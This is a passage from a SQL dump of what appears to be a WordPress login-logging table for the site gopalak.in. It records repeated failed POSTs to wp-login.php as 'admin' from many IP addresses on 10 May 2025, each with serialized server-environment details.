:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746862569.646631;s:12:\"REQUEST_TIME\";i:1746862569;}}','199.188.201.3',0,'2025-05-10 13:06:11','1970-01-01 00:00:00'),(95286,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54550\";s:11:\"REMOTE_ADDR\";s:13:\"94.198.223.74\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746863270.070137;s:12:\"REQUEST_TIME\";i:1746863270;}}','94.198.223.74',0,'2025-05-10 13:17:51','1970-01-01 00:00:00'),(95287,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43392\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746863990.34196;s:12:\"REQUEST_TIME\";i:1746863990;}}','68.65.122.90',0,'2025-05-10 13:29:52','1970-01-01 00:00:00'),(95288,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48606\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746864709.000711;s:12:\"REQUEST_TIME\";i:1746864709;}}','157.245.6.207',0,'2025-05-10 13:41:50','1970-01-01 00:00:00'),(95289,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37998\";s:11:\"REMOTE_ADDR\";s:13:\"185.252.31.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746865418.674798;s:12:\"REQUEST_TIME\";i:1746865418;}}','185.252.31.27',0,'2025-05-10 13:53:40','1970-01-01 00:00:00'),(95290,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36432\";s:11:\"REMOTE_ADDR\";s:11:\"31.7.70.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746866118.504514;s:12:\"REQUEST_TIME\";i:1746866118;}}','31.7.70.254',0,'2025-05-10 14:05:20','1970-01-01 00:00:00'),(95291,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41868\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746866827.3869231;s:12:\"REQUEST_TIME\";i:1746866827;}}','162.0.235.2',0,'2025-05-10 14:17:09','1970-01-01 00:00:00'),(95292,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33372\";s:11:\"REMOTE_ADDR\";s:13:\"185.79.157.23\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746867522.684016;s:12:\"REQUEST_TIME\";i:1746867522;}}','185.79.157.23',0,'2025-05-10 14:28:44','1970-01-01 00:00:00'),(95293,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46924\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746868220.9755991;s:12:\"REQUEST_TIME\";i:1746868220;}}','199.188.207.168',0,'2025-05-10 14:40:22','1970-01-01 00:00:00'),(95294,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53702\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746868909.815273;s:12:\"REQUEST_TIME\";i:1746868909;}}','173.212.207.177',0,'2025-05-10 14:51:51','1970-01-01 00:00:00'),(95295,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33786\";s:11:\"REMOTE_ADDR\";s:15:\"103.169.160.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746869597.9106369;s:12:\"REQUEST_TIME\";i:1746869597;}}','103.169.160.163',0,'2025-05-10 15:03:19','1970-01-01 00:00:00'),(95296,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 